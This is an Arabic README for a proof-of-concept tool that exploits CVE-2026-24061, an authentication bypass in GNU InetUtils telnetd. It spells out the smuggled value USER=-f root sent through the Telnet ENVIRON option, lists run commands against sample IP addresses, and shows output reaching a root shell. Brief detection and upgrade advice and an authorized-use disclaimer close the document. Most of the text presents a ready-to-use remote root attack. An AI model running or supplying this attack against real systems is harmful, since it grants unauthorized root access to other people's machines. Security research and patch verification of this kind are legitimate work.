
استغلال PoC لثغرة CVE-2026-24061 - تجاوز المصادقة عبر حقن الوسائط في GNU InetUtils telnetd
إصدارات GNU InetUtils من 1.9.3 إلى 2.7 معرّضة لثغرة تجاوز مصادقة عن بُعد في خادم telnetd. يفشل برنامج telnetd في تعقيم متغير البيئة USER بشكل صحيح قبل تمريره كوسيطة سطر أوامر إلى برنامج login(1). عندما يرسل عميل Telnet متغير بيئة USER يحتوي على خيارات سطر أوامر (مثل -f root)، يمرر telnetd هذه القيمة غير المعقّمة مباشرة إلى برنامج login. يفسّر برنامج login الوسيطة -f كتعليمات لتجاوز المصادقة، مما يسمح للمهاجم بالحصول على وصول جذر غير مصرح به دون تقديم أي بيانات اعتماد.
تنفيذ كامل لبروتوكول Telnet
DO وDONT وWILL وWONT.حقن تلقائي للحمولة
ENVIRON المصممة مع حقن USER=-f root.صدفة تفاعلية
إدارة الاتصال
تصحيح مطوّل
python3 exploit.py <target> -p <port> [options]
| الوسيطة | الوصف |
|---|---|
target | عنوان IP أو اسم المضيف الهدف |
python3 exploit.py 192.168.1.100
python3 exploit.py 192.168.1.100 -p 2323 -v
python3 exploit.py 10.0.0.5 -p 2323 -k 60 -t 10
إنشاء الاتصال
تفاوض البروتوكول
SGA وECHO وENVIRON).تسليم الحمولة
WILL ENVIRON متبوعًا بحمولة التفاوض الفرعي المصممة.تجاوز المصادقة
-f root في login(1) لتجاوز فحوصات بيانات الاعتماد.جلسة تفاعلية
يستخدم الاستغلال خيار Telnet ENVIRON (RFC 1572) لحقن وسائط سطر الأوامر في متغير البيئة USER.
عندما يمرر telnetd هذه القيمة غير المعقّمة إلى login -f root، يفسّر برنامج login الوسيطة -f كعلامة تفرض تجاوز المصادقة، مما يمنح وصول الجذر دون التحقق من كلمة المرور.
ينفذ سكربت الاستغلال ما يلي:
WILL وWONT وDO وDONT)NOP للإبقاء على الاتصال للحفاظ على استقرار الجلسة$ python3 exploit.py 127.0.0.1 -p 2323
[!] Coded By: K3ysTr0K3R
[*] Telnet Authentication Bypass
[*] Connecting to 127.0.0.1:2323
[+] Connection established
[+] Exploit payload sent (19 bytes)
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#
يمكن لمدراء الأنظمة اكتشاف محاولات الاستغلال من خلال مراقبة:
ENVIRON.USER التي تحتوي على -f أو وسائط سطر أوامر أخرى.قم بالترقية إلى الإصدار 2.8 من GNU InetUtils أو طبّق التصحيح الأمني الرسمي الذي يعقّم متغيرات البيئة قبل تمريرها إلى login(1).
هذا المفهوم الإثباتي مخصص لأغراض البحث الأمني والتحقق من الثغرات وبيئات الاختبار المصرّح بها فقط. استخدمه فقط ضد الأنظمة التي لديك إذن صريح لإجراء تقييمات أمنية عليها.
| الخيار | الوصف |
|---|
-p, --port | منفذ الهدف (الافتراضي: 23) |
-v, --verbose | تفعيل إخراج التصحيح المطوّل |
-t, --timeout | مهلة الاتصال بالثواني (الافتراضي: 5) |
-k, --keepalive | فترة الإبقاء على الاتصال بالثواني (الافتراضي: 30) |
-h, --help | عرض رسالة المساعدة |